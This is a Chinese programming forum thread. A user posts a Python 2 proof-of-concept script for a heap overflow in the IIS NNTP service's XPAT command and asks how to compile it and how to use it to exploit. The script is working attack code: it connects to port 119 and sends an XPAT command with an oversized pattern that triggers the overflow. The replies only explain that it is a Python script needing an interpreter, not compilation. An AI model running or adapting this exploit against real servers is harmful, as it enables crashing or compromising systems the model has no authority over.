求这源代码编译利用
#--
# IIS NNTP Service XPAT command heap overflow proof of concept
#
# Author:
# Lucas Lavarello (lucas at coresecurity dot com)
# Juliano Rizzo (juliano at coresecurity dot com)
#
# Copyright (c) 2001-2004 CORE Security Technologies, CORE SDI Inc.
# All rights reserved.
#
# THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI Inc. BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR
# CONSEQUENTIAL DAMAGES RESULTING FROM THE USE OR MISUSE OF
# THIS SOFTWARE
#
# www coresecurity com
#--
from socket import *
host = "127.0.0.1"
pat = "C"*1946 + " " + "X"*10
newsgroup = "control.newgroup"
sock = socket(AF_INET, SOCK_STREAM)
sock.connect((host, 119))
print sock.recv(512)
sock.send("group %s\x0d\x0a" % newsgroup)
print sock.recv(512)
sock.send("xpat From 1-9 %s \x0d\x0a" % pat)
纯属安全测试,想编译此代码,求详细方法,最好能告诉我怎么利用!~希望大家帮忙!~~~谢谢!~~~
[解决办法]
不太明白你所说的安全测试, 如果使纯粹想执行代码, 不需要编译.
[解决办法]
帖子中的代码是Python脚本程序,可以python解释器解释执行,不需要编译。你可以到ActiveState网站下一个Python,安装一个Python环境。
[解决办法]
换成PYTHON2.6版本就可以了!~~~~~~~~~~